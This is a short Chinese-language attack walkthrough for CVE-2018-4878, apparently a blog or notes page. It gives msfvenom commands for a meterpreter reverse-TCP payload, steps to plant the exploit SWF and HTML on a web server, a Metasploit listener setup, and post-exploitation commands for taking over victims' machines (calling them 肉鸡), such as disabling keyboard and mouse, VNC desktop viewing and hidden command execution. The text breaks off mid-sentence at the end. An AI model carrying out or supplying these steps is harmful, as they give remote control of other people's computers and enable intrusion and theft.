1.生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.130 lport=8888 -f python>shellcode.txt
lhost的修改为自己kali平台的IP,端口号也可以自行修改
2.查看shellcode
root@kali:~# cat shellcode.txt
3.编辑CVE-2018-4878-master.py文件
3.1 替换shellcode
3.2修改swf和html路径
4.执行CVE-2018-4878-master.py文件,生成web页面和swf文件,把病毒文件放入/var/www/apache2目录中
python ./cve-2018-4878.py
cp exploit.swf /var/www/html/exploit.swf
cp index2.html /var/www/html/index.html
5.攻击端启用监听
msfconsole进入msf控制台
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.96.130
msf5 exploit(multi/handler) > set lport 8888
msf5 exploit(multi/handler) > exploit
6.等待肉鸡上线
7.肉鸡浏览器访问http://192.168.96.130/index.html
8.kali看到上线后,自动建立session 可以执行控制台命令
系统信息 sysinfo
ip地址 ifconfig
当前运行的进程 ps
开启/禁用鼠标/键盘
uictl [enable/disable] [keyboard/mouse/all]
同步桌面 run vnc
在目标机中运行文件 execute -H -i -f cmd.exe -H指后台运行,-i指交互
run post/windows/gather/enum_patches 获取补丁信息 (获取的信息在
/usr/share/metasploit-framework/modules/post/windows/gather